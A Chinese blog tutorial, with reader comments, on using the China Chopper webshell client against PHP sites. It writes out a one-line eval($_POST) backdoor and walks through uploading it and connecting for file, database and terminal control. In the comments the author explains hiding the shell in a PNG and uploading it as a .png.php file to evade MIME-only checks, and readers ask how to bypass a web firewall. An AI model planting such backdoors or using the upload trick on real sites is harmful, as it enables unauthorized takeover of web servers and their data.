现在的位置: 首页 -> PHP学习 -> 中国菜刀的功能介绍和使用方法

中国菜刀的功能介绍和使用方法

2013-08-01 20:32 ⁄ 评论数 33 ⁄ 被浏览 199592 views+

中国菜刀，一个非常好用而又强大的webshell，它可不是用来切菜的做饭的道具哦，是一款专业的网站管理软件，大小只有300多KB，真是小巧实用啊！不过被不法分子利用到，就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用，哈哈。。后来领悟之后才发现并不难操作，同时功能也比我想象的要强大。

1.中国菜刀支持的服务端脚本：PHP、ASP；

2.主要功能有：文件管理（有足够的权限时候可以管理整个磁盘/文件系统），数据库管理，虚拟终端。

3.菜刀的工作原理是：利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。

今天我只介绍PHP的方法（其他的大同小异）。

首先：我们首先要新建一个php文件，文件名随意取，然后写入一句代码：<?php eval($_POST['ee']); ?> ；eval()这个函数大家并不陌生吧，就是把里面的字符串作为PHP代码执行。最后把这个文件保存，上传到你站点里面，可以是根目录，也可以是其他，都行的。如下图：

第二步：打开菜刀这个软件，进入如下界面，右键点击“添加”；如下图：

第三步：此时会弹出一个添加shell的对话框，由图一看出我的 “dxr.php”上传在站点根目录，所以这里的地址填为：http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”，也就是<?php eval($_POST['ee']); ?> 这里的“ee”。下面配置项如果你知道用户名密码就填，不知道，不填，也不会影响文件管理和虚拟终端这两个功能，只是不能查看数据库了。

最后：点击“添加”按钮，成功后就会产生一条新的记录，鼠标右键点击就可以进行操作了，如下图，可以进行文件管理，数据库管理，虚拟终端。哈哈...大功告成！！

所以很多黑站者利用一些网站漏洞，上传一句话木马后，就基本上可以黑下你的站了。中国菜刀，就是这么强大！！

操作效果截图一：

操作效果截图二：

操作效果截图三：

终于写完了，喜欢的话就支持一下哦，代潇瑞博客，专注于PHP学习！！

最后说明一下：此软件打开时杀毒软件可能会报毒的，我已经用了很多遍，反正都没事。如果你不相信的话，也就不用下载了，呵呵。

您可能还会对这些文章感兴趣！

精华回复

[已解决]想把png格式的带有一句代码的图片，能添加成功吗？

目前有 33 条评论 @我要评论

33楼雨山 : 2021-09-30 15:36:55 评论说： @回复
你好，我在自己机器上建了服务器测试了一下，设置也是按照上面做的，但是点击管理文件的时候，弹出个对话框写了HTTP头之类的，然后就关闭了，不知道是怎么回事呢？
32楼绅士 : 2019-02-01 22:16:44 评论说： @回复
虽然没看懂，但是感谢就对了
31楼puli : 2018-12-21 18:27:52 评论说： @回复
请求超时是什么情况呢？
30楼ok : 2017-09-14 11:18:21 评论说： @回复
29楼浅唱春天 : 2017-08-21 22:33:36 评论说： @回复
楼主，我去试试哈！
28楼xiaomian : 2017-03-16 21:40:00 评论说： @回复
你好可以教我吗 1070234605qq
27楼QQ363320026 : 2017-03-04 17:43:34 评论说： @回复
教我怎么绕过安全狗下。。加QQ
26楼lw124 : 2016-11-09 15:39:26 评论说： @回复
谢谢分享
25楼IT共享导航 : 2016-10-06 16:18:19 评论说： @回复
IT共享导航来访，落伍了三年，才接触站长三年前发布的文章，不过还是很实用，转载了，注明出处了，http://itdh.boqingbokeji.com
24楼bbz : 2016-07-15 16:52:17 评论说： @回复
thanks!
23楼犀利的猫 : 2016-04-20 17:49:30 评论说： @回复
师傅，我是新手，刚刚测试了提示网站防火窗怎么办？可以赐教下吗我的qq是 396107724
22楼q556 : 2016-04-11 02:55:49 评论说： @回复
楼主能加我教教我吗。2734919338我试了很多次就是不行
21楼maicaidao : 2016-03-21 18:05:37 评论说： @回复
本站： http://www.maicaidao.top 中国菜刀各版本完全无后门下载 hatchet汉化中文版中国菜刀自定义后门版中国菜刀20141213版本(最后一版) 中国菜刀20141213去弹窗中国菜刀20131215(安全脉搏发布) 中国菜刀20111116 中国菜刀20110811 中国菜刀20100928
20楼哦哦哦 : 2016-01-28 09:11:09 评论说： @回复
楼主2213958126 想学习菜刀的用法哦可以加一下吗
19楼贝壳 : 2016-01-09 22:18:50 评论说： @回复
跟着教程试了下自己的网站，可以加我QQ教教我么 272205810
18楼我要 : 2015-12-28 01:40:11 评论说： @回复
楼主，请问中国菜刀在哪里下载啊
17楼你好 : 2015-11-21 20:25:23 评论说： @回复
你好，我在自己机器上建了服务器测试了一下，设置也是按照上面做的，但是点击管理文件的时候，弹出个对话框写了HTTP头之类的，然后就关闭了，不知道是怎么回事呢？
16楼乐活资源 : 2015-08-30 15:05:15 评论说： @回复
受教了刚找到一个中国菜刀的网盘下载链接 pan.baidu.com/s/1hqm34nq
15楼天天想你 : 2015-08-21 16:21:49 评论说： @回复
可以教我吗?有大大回报。qq 1632998171
14楼形象 : 2015-06-29 20:06:00 评论说： @回复
我是新手，可以简单的叫我吗 2478148566
13楼形象 : 2015-06-29 20:05:14 评论说： @回复
新手可以叫我吗？
12楼鱼鱼 : 2015-06-16 15:33:24 评论说： @回复
弱弱的问下，我用菜刀连接了一个站，看到这个服务器里的其他的网站，可是可以下载文件，却不能修改。文本是0666的都编辑不了呢，一编辑就操作失败。
Dai 回复鱼鱼: 服务器设置了权限。
2015-06-16 23:21:33 @回复
11楼刘吉 : 2015-06-15 20:58:55 评论说： @回复
删不掉信息怎么办？
10楼想学菜刀 : 2015-06-02 07:17:59 评论说： @回复
如果可以的话，请加我QQ：1320509 时刻准备着向您请教！
9楼想学菜刀 : 2015-06-02 07:16:21 评论说： @回复
我知道网站里已经有一句话了，但不知道具体路径，在菜刀里有什么办法吗？
8楼邮莓 : 2015-05-28 19:32:06 评论说： @回复
博主，想请把png格式的带有一句代码的图片，能添加成功吗？
Dai 回复邮莓: 是利用上传漏洞吗？把png图片用记事本或其他代码编辑器打开，再把一句话代码插到里面，最好是中间的位置。如果网站验证上传文件的格式只是单纯的靠验证MIME，而没验证后缀，那么可以将伪装好的图片保存为aa.png.php上传上去，取得“图片”路径后，就可以用菜刀连接了。（这种东西玩玩可以，不要做坏事哦）
2015-05-28 23:27:04 @回复
邮莓回复 Dai: 呵呵，学习测试用，验后缀，是不玩不了拉？
2015-05-29 12:15:47 @回复
zxc 回复 Dai: 我连接上去后用菜刀打开任何php文件都显示是zend，还有啊朋友，那个管理员用户名在哪里找？
2016-05-15 20:12:15 @回复
7楼guochenming : 2015-04-29 10:19:39 评论说： @回复
能教我一下吗 QQ 5720627 谢谢啦
6楼guochenming : 2015-04-29 10:19:13 评论说： @回复
能教我一下吗
5楼412311 : 2014-07-30 20:06:06 评论说： @回复
我还是不懂你加我QQ吧935881081
4楼张三 : 2013-12-28 21:21:30 评论说： @回复
这个只能上传达室PHP格式的吗
3楼张三 : 2013-12-28 21:21:10 评论说： @回复
这个只能上传PHP格式的吗
Dai 回复张三: 也可以是asp的呢
2013-12-30 22:04:08 @回复
2楼hi : 2013-12-12 09:10:34 评论说： @回复
工具好是好，请问您刚才说新建一个文件，放到站里，既然你能在站里新建文件了，还用菜刀做什么呢？
Dai 回复 hi: 我是演示他的功能。正确流程应该是，找到网站漏洞，利用它把一句话木马植入到网站，然后菜刀就可以控制整个站了。只有这样，单纯的菜刀是没法攻击网站的。
2013-12-12 12:54:43 @回复
1楼吖 : 2013-11-22 18:59:03 评论说： @回复
我好想还是没有学会，可以加我QQ简单的教我一下吗 1273980723
Dai 回复吖: 嗯，没问题！
2013-11-22 22:17:23 @回复